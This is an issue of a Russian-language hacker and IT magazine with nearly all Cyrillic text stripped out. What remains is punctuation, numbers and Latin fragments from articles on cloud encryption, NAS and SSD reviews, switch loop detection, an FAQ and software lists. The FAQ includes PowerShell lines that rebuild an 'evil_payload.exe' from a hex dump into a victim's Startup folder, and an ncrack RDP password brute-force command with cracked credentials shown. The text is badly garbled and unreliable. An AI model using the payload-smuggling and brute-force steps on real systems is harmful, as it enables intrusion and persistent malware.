,


, - ),
.
9) , ,
, ,
.
10) , , ,
- .
? ,
,
.
11) , ,
, ,
.
, , 2 ( ), ,
, , , etc.
12)
,
, . ,
,
. :)
, ,
(
etc), ,
( ). ( ).
13) ,
.
, !
, ,
, .
14) , .
.
15) ,
,
,
.
, , , , ,
, .
16)
. ,
, . ? , .
- . ,
(
),
( ) .
.
17)
. ,
, , . ,
,
. , , ,
, ,
, .
18) ,
.
19) ,
?
. ,
, ( , ,
1 . ) - ,

. - ?
, , ,
- : ,
( ) . 90 .
, (
) .
20) , . , - .


,

.

, ,
. .
,
, . ,
,
. . :) ,
.
, ,
,
ISPDN.RU . ,
,
, , ,
.
,
,
- -.
, ( ,
,
),

. ,
. , ,
, , - ,
. z


?
:
1) , ,
, ,
.
2)
152-, .
3)
152- .
4)
,

,
. ,
, , ,
,
,
.
5)
:
. .
,
. . ,
, ,
.


. ,
,
, ,
,
, . .
.
,
, ,
, ,
.
.
6) ,
( ) (
)
( ).
7)
.
, ,
. ,
, ,
.

8) ,
(
,
,
, etc).
9)

152-.
10)



, , .
,
.
11)


,

, ,
,
.

.


FAQ

, ,

, ,
. ,

. ,

,



,
.
.

.
, .
,
, , , ,
. .
,

,
VLAN
.


.

.

,
?

,
,
,
. ,
,
- .
,
.

:

3;

2;

1.
, ( ),
2 -
.
,

.
.
,

. ,
.



,


?


,
?

,



.
.


:
,
, .
,
.


grinder (grinder@tux.in.ua)

WWW
LUKS code.
google.com/p/
cryptsetup
MySQL 5.6
Reference Manual
Encryption and
Compression - clck.
ru/P85I
Windows Azure SDK
microsoft.com/
windowsazure/sdk

vGate R2
securitycode.ru/
products/sn_vmware/vgate_com
Novell
Cloud Security Service novell.com/
products/cloudsecurity-service
FreeOTFE
freeotfe.org


INFO


. ,
PR, ,

,
.
,


.
.

.


. ,
(PaaS)
(SaaS) ,
.
,
. , (
). , . ,
, , ,
- .
, ,
, .
, , v-index.com, 38,9 %. ,
, . ,
.
,
,
,
.
,
SaaS (Software as a Service )
PaaS (Platform as a Service ),
, .
,
. : .
,
,
SaaS. , .
, ,
. ,
, Google Amazon,
,


v-index.com,

, -
.
- ,
. ;)
,
. ,
- .
, .

.
,
( )
, ,
, . ,
.
, DMZ ,
(VPN, /etc/hosts.allow).
DDoS-
.
. ,
, SaaS

. , . ,
.
,
, .
Security Code TrustAccess (securitycode.ru/
products/trustaccess) .

. ?
.
,
, , ,
. SaaS , ,
, ,
- VMware vCloud Director .

, ,
( ):
, .
,
. , ComputerWorld,
, ,
, VMware
vSphere. SaaS .
, .
, , SaaS
. , -
. -
. ,
,
( ).
,
,
- . ,
, VMware, vGate
R2 (securitycode.ru/products/sn_vmware/vgate_com).
,
(
VM), ,
, ( ACL ), VM, .
() ()
. ,
-.

(gnu.org/philosophy/who-does-that-server-reallyserve.html)
, .
SaaS-
.


,
.
. ,


vGate

Novell Cloud Security Service (NCSS, novell.
com/products/cloud-security-service)
, .
NCSS :
( Active Directory). ,
SaaS/PaaS/IaaS, , NCSS
, .
, SaaS
,

. ,
, SaaS
.
,
.
, ,
, .

.


, ,
, .
SaaS . HTTPS, .
,

DM-CRYPT
dm-crypt ,
2.6+ CryptoAPI.
, ,
hibernate.
- Windows FreeOTFE,
Windows.
$ sudo apt-get install cryptsetup
:
$ sudo dd if=/dev/zero of=/dev/sda5 bs=4K
/dev/mapper/:
$ sudo cryptsetup -y luksFormat /dev/sda5
$ sudo cryptsetup luksOpen /dev/sda5 encdisk

, .
$ sudo mkfs.msdos /dev/mapper/encdisk
$ sudo mount -t vfat -o rw /dev/mapper/encdisk /mnt/encdisk
:
$ sudo umount /mnt/encdisk
$ sudo cryptsetup luksClose /dev/mapper/encdisk


.
, -
,
( Amazon EC2), , . 152
(clck.ru/P0dc)
. ,
. ,

. ,
, ,
, . -152
, , , , .

. ,
. . ,
( ),
. ,
, -
. PCI (Payment
Card Infrastructure),
, : .
, , , , , PCI, .

, . ,
- ? ,
.
.
LUKS (The Linux Unified Key Setup, code.google.com/p/cryptsetup),
Linux dm-crypt, . LUKS
TKS1 (Template
Key Setup 1), ,
,
. Windows
FreeOTFE (freeotfe.org),
Linux (cryptoloop, dm-crypt)

- HSM (Hardware Security Module, ) PKCS#11.
, Windows BitLocker ( EFS,
Encrypted File System).
. ,
,
. ,
, ,
. - ,

, . ,
MySQL Reference Manual . 11.13 Encryption


MySQL 15

Linux dm-crypt

and Compression Functions, 15 .


SQL- , .

.
,
, , .
. ,
,
Trend Micro SecureCloud,
FreeOTFE . ,
, ,
. . Amazon EC2, Eucalyptus
vCloud. SecureCloud ,
. , / .

> CREATE TABLE md5_tbl (md5_val CHAR(32), ...);

> INSERT INTO md5_tbl (md5_val, ...) VALUES(MD5('abcdef'), ...);

API . Windows Azure SDK


(microsoft.com/windowsazure/sdk), Windows Azure, , CSP (Cryptographic Service Provider,
).
, ,
XSS SQL injection , , ,
.
,
, .
, , ( , )

FreeOTFE Linux


, , . ,
, ,
. , . ! . z

Trend Micro SecureCloud



FERRUM

NAS

5- 6-
NAS-


.
,
( NAS)
. ,
!

. .
,
, . ,

. RAID. ,
RAID.
,
, .
,
? NAS. ,
100 ,
. NAS
, .


.
Intel NAS Performance Toolkit
. NAS , . , RAID0. RAID5 ,
.
, . ,
NAS.
.


NAS

D-LINK SHARECENTER
PRO 1200
D-Link
, Ethernet
USB. .

OLED- . ,
, .
, , . ,
, ,

.
D-Link ShareCenter Pro 1200 . ,
.
- D-Link
. , iSCSI. ,
- .

24 000
.

NETGEAR READYNAS
6 ULTRA
NETGEAR
. . . NETGEAR ReadyNAS
6 Ultra
2 . ,
12 , .
. RAID5.
FrontView. ,
.

.
, .
NETGEAR ReadyNAS 6 Ultra,
, , .

26 000
.


NETGEAR READYNAS 6 ULTRA PLUS


NETGEAR ReadyNAS 6 Ultra Plus NETGEAR ReadyNAS 6 Ultra.
. - Intel Atom, Intel Pentium E2160,
1,8 .
. ,
. ,
.
.
FrontView 4.2.16 .
-,
Boot Menu. -,
RAID5 . ,
NETGEAR ReadyNAS 6 Ultra. ,
. , ,

.
.

30 000
.

QNAP TS-559 PRO+


QNAP TS-559 Pro+,
.
QNAP .
, QNAP
,
. QNAP TS-559 Pro+
, , .
VGA- . ? ,
, . VGA . QNAP
TS-559 Pro+ . ,
. RAID5 ,
.

38 000
.


D-Link ShareCenter Pro 1200

2x Ethernet (10/100/1000 /c), 2x


USB 2.0
JBOD, RAID 0, RAID 1, RAID 5, RAID 6,
RAID 10
CIFS/SMB, FTP, UPnP, HTTP, NFS, ISCSI

NETGEAR ReadyNAS
6 Ultra

NETGEAR
ReadyNAS 6
Ultra Plus

Intel Atom Dual Core, 1,66


DDR2 DIMM 1x 1
2x Ethernet (10/100/1000 /), 3x USB 2.0

Intel Pentium E2160, 1,8


DDR2 DIMM 1x 1
2x Ethernet (10/100/1000 /), 3x USB 2.0

X-RAID2, RAID 0, RAID 1, RAID 5, RAID 6

X-RAID2, RAID 0, RAID 1, RAID 5, RAID 6

CIFS/SMB, FTP, UPnP, HTTP, AFP, NFS, DLNA,


Bonjour

CIFS/SMB, FTP, UPnP, HTTP, AFP, NFS, DLNA,


Bonjour


NAS

SYNOLOGY DISKSTATION DS1511+


Synology DiskStation DS1511+ QNAP TS-559 Pro+.
Synology ,
. -,
. ,
. -, ,
.
, , .
. ,
QNAP TS-559 Pro+, Synology DiskStation DS1511+
, , , . ,
.
, . 45 .

35 000
.

THECUS N5200XXX
Thecus N5200XXX.
. , NETGEAR: , , , .
: Intel Atom D525
1 DDR3 . ,
.
. , HDD.
OLED-, /
LAN- USB-.
Thecus N5200XXX , . , ,
, , ,
.

30 000
.

QNAP TS-559
Pro+

Intel Atom D525, 1,8


DDR2 1x 1
2x Ethernet (10/100/1000 /), 5x
USB 2.0, 2x eSATA, VGA
JBOD, RAID 0, RAID 1, RAID 5, RAID 5+,
RAID 6, RAID 6+, RAID 10, RAID 10+
CIFS/SMB, FTP, TFTP, UPnP, HTTP,
HTTPS, AFP, NFS, DLNA, Bonjour,
iSCSI, telnet, SSH, SNMP


Synology DiskStation DS1511+

Dual Core, 1,8


DDR2, 1 1
2x Ethernet (10/100/1000 /c), 4x
USB 2.0, 2x eSATA
JBOD, RAID 0, RAID 1, RAID 5, RAID 6,
RAID 10
CIFS/SMB, FTP, TFTP, UPnP, DLNA,
HTTP, AFP, NFS, Bonjour, ISCSI

THECUS
N5200XXX

Intel Atom D525, 1,8


DDR3 SODIMM 1 1
2x Ethernet (10/100/1000
/c), 5x USB 2.0, eSATA
JBOD, RAID 0, RAID 1, RAID 5,
RAID 6, RAID 10
CIFS/SMB, FTP, TFTP, UPnP,
HTTP, AFP, NFS, Bonjour, ISCSI


, ,
.
, NAS, 5-
6-. , ,
QNAP,
Synology Thecus. .

NETGEAR. NAS
( ), . z



SILICON POWER
SP060GBSSDV30S25

,
.
IOmeter,
SSD /
, .
IOmeter,

, . . PCMark Vantage,
HDD, ,
,
. , ATTO Disk
Benchmark /
0,5 8192 .
,
.

: SSD, 2,5
: SATA 3.0
: MLC
. : 550 /
. : 500 /
: 60
TRIM:

:
+
+
+
-
SSD, ,
,


.


SSD

.
Silicon Power
SP060GBSSDV30S25. -
60 , Windows 7

,
.

5400
.

:
IOmeter:
Random read 4 : 21,44 /
Random write 4 : 19,77 /
Seq. read 128 : 313,41 /
Seq. write 128 : 332 /
IOmeter patterns:
Database: 36,43 /
Fileserver: 41,08 /
Workstation: 34,50 /
Webserver: 51,35 /
PCMark Vantage:
Test Suite: 26076
Windows Defender: 42,95 /
Gaming: 176,73 /
Importing pictures to Windows Photo Gallery: 271,45 /
Windows Vista startup: 30,18 /
Video editing using Windows Movie Maker: 88,42 /
Windows Media Center: 340,73 /
Adding music to Windows Media Player: 151,54 /
Application loading: 167,14 /


, SandForce
SF-2000
MLC.
35 ,
.
Silicon Power SP060GBSSDV30S25 ,

SATA 3.0,
. ,

, ,
IOmeter,
.
Silicon Power SP060GBSSDV30S25
:
3,5- . SSD,

480 .

,
,
. Silicon
Power SP060GBSSDV30S25, !
. z


PHREAKING

aka Lundes (sergey.lunde@gmail.com)

Loop

,

INFO
Rx Tx
Receive
Transmit
( ).
Loop . ,
, ,
, .

-
, .

. ,

,
.
, , ,
. , ,
,
.

. ,
().
, . ,


, . ,
: ! : !.
- : ! :
! ! ? !
! ? , !

- .
,
,
. -
, . ,
, .
(broadcast storm).
,
- (. 1). -
... .
. loop_detection,
.


, .


Loop

1 TX+

-. . +

2 TX-

. . -

3 RX+

-. +

4 n/c

. ( )

5 n/c

-. ( )

. -

7 n/c

-. ( )

8 n/c

. ( )

1. RJ45

: (
) Ethernet ( Telnet
web-). .
Ethernet, IP-.
Web-

, , . . , web 80 HTTP- IP-.

. 1.

DLINK DES-3200
-,
.
1. IP-
:
DES-3200# config ipif System \
ipaddress xxx.xxx.xxx.xxx/yyy.yyy.yyy.yyy.

xxx.xxx.xxx.xxx IP-, yyy.yyy.yyy.yyy. .


2. , IP- , :
DES-3200# show ipif

3. web- IP- .
D-Link , RS-232, ,
. Out-of-Band.
,
.

(, HyperTerminal
Windows). :
Baud rate: 9,600
Data width: 8 bits
Parity: none
Stop bits: 1
Flow Control: none


. , Ctrl+r ,
.
.
,


Loopback-

Enter . , DES-3200#. .
, ,
, , .
? ,
.
, config,
:


RJ-45

DES-3200#config +

? Enter.
.
TAB.



. .
: Admin User.
Admin .

CLI:
DES-3200# create account admin/user <username>
( / )


: Enter a case-sensitive new password.
15
.
Success.
Admin:
Username "dlink":
DES-3200#create account admin dlink
Command: create account admin dlink
Enter a case-sensitive new password:****
Enter the new password again for confirmation:****
Success.
DES-3200#

: DES-3200# config
account <username>

dlink:
DES-3200#config account dlink
Command: config account dlink
Enter a old password:****
Enter a case-sensitive new password:****
Enter the new password again for confirmation:****
Success.

: DES-3200# show account.


delete account
<username>.
. web- Telnet,
IP- ,
. IP- DHCP BOOTP
CLI:
DES-3200# config ipif System dhcp,
DES-3200# config ipif System ipaddress \
xxx.xxx.xxx.xxx/yyy.yyy.yyy.yyy.

xxx.xxx.xxx.xxx IP-, yyy.yyy.yyy.yyy. ,


System .
.
. D-Link

().
, .
D-Link
config ports. ,
, 10 /,
13
.
DES-3200#config ports 1-3 speed 10_full learning enable state enable
Command: config ports 1-3 speed 10_full learning enable state enable
Success

show ports < > .


. NVRAM.
save:
DES-3200#save

,

,


Command: save
Saving all settings to NV-RAM... 100%
done.
DES-3200#

.
reboot:
DES-3200#reboot
Command: reboot

! reset.
DES-3200#reset config
-, reset, .
loop_detection Alcatel
interface range ethernet e(1-24)
loopback-detection enable
exit
loopback-detection enable
loop_detection Dlink
enable loopdetect
config loopdetect recover_timer 1800
config loopdetect interval 1
config loopdetect mode port-based
config loopdetect trap none
config loopdetect ports 1-24 state enabled
config loopdetect ports 25-26 state disabled

.
loopback .
. , , -
, UP-, , ,
. - .


:
, (Rx Tx).
,
2 6, 1 3.
, , -
-. . 3.
,
, link. !
!

, HELLO WORLD
Hello world? !
,
.
, ,
.
(. 4).
? ,
,
- -.
.
, .
. ?
. . ? !
Hello World Cshell:


LOOPBACK
Loop ,
. ,
loopback-.
. loopback-.
, , ,
, .

Cshell, Hello world


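#!/bin/csh
# ver. 1.0
# Run only if no other copy of this script (redbut) is already running
if ( `ps | grep 'redbut' | grep -v 'grep' | wc -l` <= 1 ) then
    # Directory with the snmp utilities and the SNMP community string
    set snmpdir = "/usr/local/bin/"
    set community = "public"
    # Options passed to snmpget
    set snmpcmd = "-t1 -r1 -Oqv -c $community -v1 -Cf "
    # $1 is the switch IP address, $2 is the interface index to watch
    set mib_stat = "IF-MIB::ifOperStatus.$2"
    set uid = "$1"
    set fl = '0'
    # Poll the port status every 10 seconds
    while ( "$fl" == '0' )
        set nowstatus = `$snmpdir/snmpget $snmpcmd $uid $mib_stat | sed 's/up/1/;s/down/0/;/Wrong/d'`
        if ( "$nowstatus" == 1 ) then
            echo 'Hello World'
            # Send a notification by e-mail
            echo " ! Hello World!" | sendmail -f[__] [_]
        endif
        sleep 10
    end
endif
exit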

:
./script.csh IP_ _.

,
. , , ,
,
!


, .
: ?
:
. ,
. , ,
, - .
!
loop_detection , .
, .
! z


UNITS / FAQ UNITED

(twtitter.com/stepah)

FAQ United

FAQ@REAL.XAKEP.RU


LINUX?

OpenSSL .

,
:

OpenSSL! -,

Linux-,

SSL-.
,
. ,
OpenSSL
, , ,
,
.
1. .

GnuPG (www.
gnupg.org),
OpenSSL:

$ openssl aes-256-cbc -d -in \
file-test.aes -out file-test-dec

$ openssl aes-256-cbc -salt -in \
file-test -out file-test.aes
enter aes-256-cbc encryption password:
Verifying - enter aes-256-cbc
encryption password:

filetest AES-256 ( CBC)


file-test.aes.

, OpenSSL
,
bash-. , , ,
:
$ for f in * ; do [ -f "$f" ] && openssl \
aes-256-cbc -salt -in "$f" -out "$f.enc" \
-pass file:password.txt ; done

2. . OpenSSL
, SHA1-1 MD5-. SHA1
file-test-64:
$ openssl sha1 file-test-64
SHA1(eapol-64)= afc594f26ca0878073769d24f8c04fe35f2bf8b3

3. , SSL/TLS
,
OpenSSL.

:

$ echo 'GET / HTTP/1.0' | openssl s_client \
-connect example.com:443
[...]
New, TLSv1/SSLv3, Cipher is
DHE-RSA-AES256-SHA
Server public key is 2048 bit

, TLSv1/
SSLv3.
4. OpenSSL
speed test,
. :
$ openssl s_time -connect \
webserver.com:443

-


,
(FTP.EXE, . .)
.


,

debug.exe.
64
. , debug.exe
Microsoft.
, Windows 7 Server 2008 PowerShell, -

5 : DNS-

C&C-.
DNS- ,
IP-
.
?
,
, hosts?


BIND (www.isc.org).
DNS-
DNS-, BIND, , .
, ,
. DNS-.

ApateDNS (bit.ly/sZQiK1).
security- Mandiant.
DNS-
IP-, .
, , ApateDNS ( ),

DNS.



. ?


.

PowerShell:



ANDROID-,

ANDROID? GOOGLE,
!

PS > [byte[]] $hex = get-content -encoding byte -path C:\temp\evil_payload.exe
PS > [System.IO.File]::WriteAllLines("C:\temp\hexdump.txt", ([string]$hex))

Andoid',
Android SDK,
,
ARM
x86. -
. ,
,

Bluestacks
(bluestacks.com). , Android-,


.
.
hexdump.txt -
:
77 90
184 0
0 0 0
0 0 0

144
0 0
0 0
0 0

0 3
0 0
0 0
232

0
0
0
0

0
0
0
0

Android.
. ,

, .
,
, . ,
, .
Bluestacks 7 .
,
Android x86 (www.android-x86.org),
.

(http://bit.ly/rYs9OI),
!

0 4 0 0 0 255 255 0 0
64 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0
0 14 31 ....

,
. ( ,

),
(
).
PS-:
PS > [string]$hex = get-content -path C:\Users\victim\Desktop\hexdump.txt
PS > [Byte[]] $temp = $hex -split ' '
PS > [System.IO.File]::WriteAllBytes("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\evil_payload.exe", $temp)

,
.

,
.

FakeDNS (bit.ly/szUFXI).
Malcode
Analysis Pack. ApateDNS,
DNS,
IP-. ( ) HEX.


Android-x86, VirtuaBox, ,
Nexus One!

fakedns.py (bit.ly/vhgamQ).
DNS Python ( 40 )
. IP ,
fakedns.py,

.

HostsMan (bit.ly/uZAV0X).

DNS-,
hosts. , ,
. , , 99%
. :)




,

CTRL + SHIFT +
ESC?


Process Explorer
(bit.ly/ugFDpx) Replace
Task Manager,
. ,
:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe

taskmgr.exe
, . Debugger (,
c:\utils\Process Explorer\procexp.exe).

,

-
WEBSOCKET?


. ,
:
1. ,
, Wireshark (www.wireshark.org).
,
WebSockets,
,
HTTP (, SOAP).
2. Firefox
Tamper Data (bit.ly/sM49Hk),
,
.

N . ,
.
: Low, Medium
High. , -
,
Medium (
). ,

. Process
Explorer
(View Select
Columns Integrity Level).
? ,
- ,
usermode.
, , ,
KeePass ,
,
.
. - ,
KeePass
.
KeePass
High, . !
-
( KeePass)

Run as administrator. , ,
,
.
, .
Windows Integrity Levels .
icacls,

Chml (bit.ly/s0BLCm). ,

( "-i:h") ( "-nr"):

192.168.26.137:3389,CL=2
rdp://192.168.26.137:3389 (EID 1) Login
failed: 'administrator' 'admin'
...
Discovered credentials on
rdp://192.168.26.137:3389 'administrator' 'admin123'

!

.



NETSETMAN (WWW.NETSETMAN.COM)?


netsh

dump:
netsh interface dump > netsh-config1.txt


:
# ---------------------------------
# Interface IP Configuration
# ---------------------------------
pushd interface ip
# Interface IP Configuration for "Local Area Connection 1"
set address name="Local Area Connection 1" source=dhcp
set dns name="Local Area Connection 1" source=dhcp register=PRIMARY
set wins name="Local Area Connection 1" source=dhcp
popd
# End of interface IP configuration
...

, netsh -f:

chml file.zip -i:h -nr


netsh -f netsh-config1.txt


Q WINDOWS
INTEGRITY LEVELS?

?
Windows Vista, 7
A Server 2008,
, mandatory integrity levels (MIL).
,
Microsoft
, ,
-
, .

.

,
N


, file.zip
Access is denied.

,
,
, ,
. z


RDP?

,

RDP-, TSGrinder (bit.ly/uThpnS).
.

ncrack (nmap.org/ncrack)
nmap ,
RDP. :

$ ncrack -vv -d7 --user administrator \


-P /home/user/passlist.txt \

FakeDNS DNS-..


>System
AutoHideDesktopIcons 1.41
Device Remover 0.9
DTaskManager 1.51
Free File Unlocker 1.0
GPU-Z 0.5.6
HD Tune Pro 5.0
HDClone 4.0.7
JaBack 9.12
Nimi Visuals
OCCT Perestroika 4.0.0
Real Temp 3.60
Smart Defrag 2.2
Svchost Process Analyzer
System Explorer 3.6.2
WhoCrashed 3.02
X Mouse Button Control 2.0

>>UNIX
>Desktop
Cheese 3.2.2
Clementine 0.7.1
Coolreader 3.0.43
Dvdisaster 0.72.3
Freecad 0.11.4422
Gnuplot 4.4.4
Handbrake 0.9.5
Imageagick 6.7.3-8
K9copy 2.3.7

>Net
Angry IP Scanner 3.0 Beta 6
ClipGrab 3.1.3.1
Freeproxy 4.10
IncrediMail 2.5
Koma-Mail 3.82
LiteManager 4.4.1
NetMeter 1.1.4
NetWorx 5.2.1
Pokki
RadioClicker 8.11

>Security
Ariadne
BeEF 0.4.2.11
Buster Sandbox Analyzer 1.44
CIAT 1.02
ClamAV 0.97.3
DirBuster 0.12
Emulation Framework 1.0.0
File Disclosure Browser
GenXE 0.9.0
Hades
John the Ripper 1.7.9
MagicTree 1.0
MeMMoN
NetworkMiner 1.1
NetworkMiner 1.2
NMapSi4 0.3 beta
PEiD Plugins
Rec Studio 4
thc-ssl-dos 1.4
USB Cop 1.0
VanishCrypt
VirtualKD 2.6
w3af 1.1
Windbgshark 0.0.1
Window Maximizer v2.00
Windows-privesc-check
WPScan 1.1
X-Scan 3.3

Skype Voice Changer 1.0


SmartSniff 1.91
Terminals 2
TweetMyPC 3.9
VideoCacheView 2.02
Virtual Router 0.9

>Multimedia
All Free ISO Burner
Avidemux 2.5.5
AVS Media Player 4.1.8.93
ExifTool 8.71
Free Audio Converter 5.0.2
Free Screen Video Recorder
2.5.19
Jimp 2.0.0
KMPlayer 3.0.0.1442
ManyCam 2.6.60
Photoscape 3.5
Sonarca Sound Recorder 3.7.8
Songbird 1.10.1
STDU Viewer 1.6.62
Sysygy Image Viewer 1.3
Ubuntu Skin Pack 8.0
WindowTabs

>Misc
7stacks 1.5
Droid Explorer 0.8.8.2
EssentialPIM 4.5
FavBackup 2.1.1
Fences 1.01
FileMenu Tools 6.0.1
FreeCommander 2009.02b
PointerStick 1.21
Q-Dir 4.87
Rainmeter 2.1
RocketDock 1.35
SumatraPDF 1.9
UboroBot 2.0
ViewFD 2.3.0
Volumouse 1.72
WinSplit Revolution 11.04

>>WINDOWS
>Development
AjaxControlToolkit 4.1.51116
DEV-C++ 4.9.9.2
Dia 0.97.1
Facebook C# SDK 5.3.2
HAP 1.4.0
HeidiSQL 6.0
HiAsm 4.4
Json.NET 4.0
Mocha 0.0.8
PHPExcel 1.7.6
PTVS 1.1
PyScripter 2.4.3
SDL 1.2.14
StyleCop 4.6
TReplacer 2.11
Utilu IE Collection 1.7.2.0

>Security
Blueproximity 1.2.5
Chatsniff 1.0
Clamtk 4.36
Emulation Framework 1.0.0
Fwbuilder 5.0.0.3568
Gadmin-openvpn-server 0.1.5
GenXE 0.9.0
GoLISMERO
Gsasl 1.6.1
HOPPER
Ipclassify 1.1

>Net
Aweather 0.6
Chrome 15
Dada_mail 4.8.4
Evolution 3.2.2
Firefox 8.0.1
Getleft 1.2
Instantbird 1.1
Knemo 0.7.2
Ktorrent 4.1.3
Lftp 4.3.3
Liferea 1.6.6b
Linphone 3.4.3
Linuxdcpp 1.1.0
Smuxi 0.8
Stealthnet 0.8.7.9
Swift 1.0
Tvdownloader 0.7.2
Watchvideo 2.2.1

>Games
Flightgear 2.4.0
Netrek 3.3.0

>Devel
Apache_tika 1.0
Dlib 17.44
Freebasic 0.23.0
Geany 0.21
Groovy 1.8.4
Gtk 3.3.4
Javatools 0.44
Jvcl 3.45
Libglass 2.0.0
Libmicrohttpd 0.9.17
Maveryx 1.3.0
Nant 0.91
Open64 5.0
Padre 0.92
Pypy 1.7
Quexml 1.3.7
Raptor2 2.0.5
Ruby 1.9.3-p0
Valgrind 3.7.0

Libreoffice 3.4.4
Metamorphose 1.1.2
Nip2 7.26.3
Optipng 0.6.5
Pyroom 0.4.1
Tomboy 1.9.3
Wavesurfer 1.8.8p3
Xine 1.1.20
Xorriso 1.1.8

>>MAC
Amaya 11.3.1
AppHack 1.1
Aptana Studio 3.0
Art of Illusion 2.9
Boxer 1.2
Clementine Music Player 0.7.1
DeTune 1.0.6
DVDTheque 3.1.2
GitHub 1.1
GV Connect Widget 2.1.1
JollysFastVNC 1.32
Magican 0.9.63
Mou 0.7.0
RaidEye 2.0
SourceTree 1.2.9
Tincta 1.3.1
Veusz 1.14
VMware Fusion 4.1.1
Winamp 0.7.1

>X-distr
openSUSE 12.1

>System
Apt-dater 0.8.6
Css 20111030
Di 4.31
Freeipa 2.1.3
Glpi 0.80.5
Grep 2.10
Libertine 5.1.3-2
Linux 3.1.3
Pbis 6.1.0.8729
Pf-kernel 3.1.3
Synctool 5.1
Virtualbox 4.1.6
Webmin 1.570
Winetricks 20111115
Zabbix 1.8.9

>Server
Apache 2.2.21
Asterisk 1.6.2.20
Bind 9.8.1-p1
Cups 1.5.0
Dhcp 4.2.3
Dovecot 2.0.16
Freeradius 2.1.12
Lighttpd 1.4.29
Mysql 5.5.18
Nsd 3.2.9
Openldap 2.4.27
Openvpn 2.2.1
Postfix 2.8.7
Postgresql 9.1.1

John the Ripper 1.7.9


Naxsi 0.41
NmapSi
PHP Vulnerability Hunter 1.1.4.6
Rec Studio 4
Revelation 0.4.12
sqlsus 0.7.1
Strongswan 4.6.1
Tripwire 2.4.2.2
w3af 1.1


UNITS / WWW2

WWW2
ROUTERPWN
www.routerpwn.com
, . , mac_find (
MAC-) phenoelit (
).
, . ,
, ,
IP- . ,
:).
C

KICKSEND
kicksend.com
,
Rapidshare , . -
, e-mail . , ,
, , :
e-mail 500 ? , , 1 . .

PROXPN
proxpn.com
, proXPN, one-click-
VPN- . ,
OpenVPN, , , . ,
proXPN . , . ,
. (, WiFi-),
.
VPN-

JPC 2
jpc2.com
,
.
Javascript PC Emulator (bellard.org/jslinux),
( JavaScript), Linux. JPC 2 , , Java : Windows XP Ubuntu .
jpc2.com, .
, .
Windows XP Ubuntu


: . : .

UNITS / GEEK ART


UNITS / 2012

NY2K+12
. MUST SEE
MUST VISIT ,

.

- , .
: .
,
.

20-23

14-16

30-31

2012

HITB

BLACKHAT

PHDAYS

CONFIDENCE

conference.hitb.org

www.blackhat.com

www.phdays.ru

confidence.org.pl

, ,
,

,
,
,
.



. , ,

.

PHDAYS

.
,
. ,
CTF-.

:
, ,

.
,
:).

26-29

25-26

2012

DEFCON

CC'2012

ZERONIGHTS

www.defcon.org

cc.org.ru

www.zeronights.ru

DEFCON
RUSSIA

, 20-

-.
,
:

!


demoscene-.

.

.

,
: ,

.
!

www.defcon-russia.ru


2011 5
.
IT/-,
. !
